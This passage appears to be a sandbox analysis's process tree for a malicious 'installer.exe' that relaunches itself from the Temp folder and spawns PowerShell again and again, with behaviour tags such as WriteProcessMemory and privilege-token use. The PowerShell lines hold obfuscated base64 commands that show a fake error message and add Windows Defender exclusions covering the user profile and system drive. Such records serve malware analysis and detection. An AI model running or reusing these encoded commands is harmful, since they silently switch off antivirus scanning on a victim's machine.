      PID:4716
  - - C:\Users\Admin\AppData\Local\Temp\installer.exe
      "C:\Users\Admin\AppData\Local\Temp\installer.exe"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:2056
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5048
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1776
    - - C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        5⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2384
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1736
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4740
      - C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        6⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:60
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:404
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:400
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        7⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:2492
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2120
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2444
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        8⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3624
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:740
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4144
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        9⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:4240
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        10⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2552
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        10⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3012
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        10⤵
        Checks computer location settings
        
        PID:1220
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        11⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4132
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        11⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4772
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        11⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:1640
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        12⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3000
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        12⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:612
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        12⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:1156
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        13⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5408
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        13⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5456
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        13⤵
        Checks computer location settings
        
        PID:5544
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        14⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5836
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        14⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5964
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        14⤵
        Checks computer location settings
        
        PID:5996
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        15⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5288
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        15⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5376
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        15⤵
        Checks computer location settings
        
        PID:5396
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        16⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5584
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        16⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5816
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        16⤵
        Checks computer location settings
        
        PID:5544
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        17⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2464
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        17⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5532
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        17⤵
        Checks computer location settings
        
        PID:5492
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        18⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5300
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        18⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5200
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        18⤵
        Checks computer location settings
        
        PID:2076
        
